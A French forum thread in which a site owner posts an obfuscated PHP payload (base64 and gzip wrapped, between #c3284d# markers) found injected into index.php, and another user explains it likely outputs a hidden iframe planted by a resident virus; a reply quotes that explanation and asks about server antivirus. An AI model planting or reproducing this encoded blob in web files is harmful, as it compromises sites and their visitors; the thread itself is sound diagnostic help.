Discussion :

[yakotey]

Bonjour.

J'ai retrouvé un code malveillant dans un de mes fichiers (html, php), notamment le index.php.

1. Quelqu'un sait ce que fait ce code exactement?

2. Comment puis-je savoir comment s'est déroulé l'attaque?

Des indices svp.

Merci.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
#c3284d#
echo(gzinflate(base64_decode("tVW5jtswEP0XVVIMyxweEglbabZOlXKxheHYkbCOZchCkI2Rfw9neEkbLbIp0oxpcvjmvTmo3e0wdNfx4zi83C/r5vh9f86za7bKhn7sx5frMSu2vw778dDmP38civuRXLaXJgOoyxIYK0sD2q6gxqUJBpiUaBVtGHRAX67Rl3Hy4BVa9FZaERg6o5FoRGWvCXIFhsEEHeNfba2uBS5lQlWJDO4aDf6+kgGJ0MHi2fsGIm30BAaRPFRIAmQU46hCClsRmIWtSHLNI8AiliBDrlLNM2BeMRAKMDbSFjBVvahPVnQkVIgETBuygaD3YDoI994E90aZXMJMkGv0JAhEvZS7gBCpK6c6dsdrva7ilFyACQcO80R6jyox4zNmkllghRQUCL8iwS7Af+CSchow0LlKRVMzMrSaNAWx/ueaytCq1L/U6RSRVoLuiCoVn+i7THFLXyIRyZEI56+7w91LTUv19MmQjp3wEH5YIO66PnHxFLUMk/NeYzKuiea7lfsqsQW5ZuFOLcJcLyaYhf7xk0zkqeyukhMdFF1rHrNCRzw2gKknk8TnCORb1TGtTp7rIBYegDdEL8w6V3/uQXo+UshQkzpmL02xn9L0ai3l9O+P8WyIsvJ2PXdjnpWl/TS0Dd/emizbnvoh7xq27dZcy539bWDVFffnprPnt9XnceguXx+z09B/e2j3w0P/5Zg95ZfH56dN3q3bD5/2Y1uezj3CbNpiZQr73elOOQPVNA2I4pjf7M5u479XvwE=")));
#/c3284d#

[Idelways]

Bonjour yakotey,

Ce code contient du code malicieux caché sur plusieurs niveaux. Il est tout d'abord encodé en php en base64, gziper (compressé), puis obfusqué en javascript en convertissant les caractères en codes équivalents. Le tout est déployé au moment de l'execusion pour afficher, vraisemblablement une iframe.

Ce genre d'attaque vient généralement d'un virus résident dans la machine. Ce dernier scane l'ordinateur à la recherche de fichiers sources Web (HTML, php, feuilles CSS...) et y injecte partout ce bout de code.

La résolution du problème est d'irradier ce virus, puis d'analyser ses fichiers sources à la recherche de ce code malicieux, et de le supprimer. Certains antivirus font ça mais suppriment tout simplement les fichiers concernés, ce qui peut être gênant.

Bon courage

[yakotey]

Bonjour yakotey,

Ce code contient du code malicieux caché sur plusieurs niveaux. Il est tout d'abord encodé en php en base64, gziper (compressé), puis obfusqué en javascript en convertissant les caractères en codes équivalents. Le tout est déployé au moment de l'execusion pour afficher, vraisemblablement une iframe.

Ce genre d'attaque vient généralement d'un virus résident dans la machine. Ce dernier scane l'ordinateur à la recherche de fichiers sources Web (HTML, php, feuilles CSS...) et y injecte partout ce bout de code.

La résolution du problème est d'irradier ce virus, puis d'analyser ses fichiers sources à la recherche de ce code malicieux, et de le supprimer. Certains antivirus font ça mais suppriment tout simplement les fichiers concernés, ce qui peut être gênant.

Bon courage

Aie!
Bjr et merci Idelways.

C'est un peu ce que je craignais, car j'ai changé les mots de passe ftp et corrigé les fichiers concernés mais le souci revient.

Avez-vous une idée d'un antivirus qui pourrait scanner le serveur dédié ovh release 2?

Merci d'avance.

Merci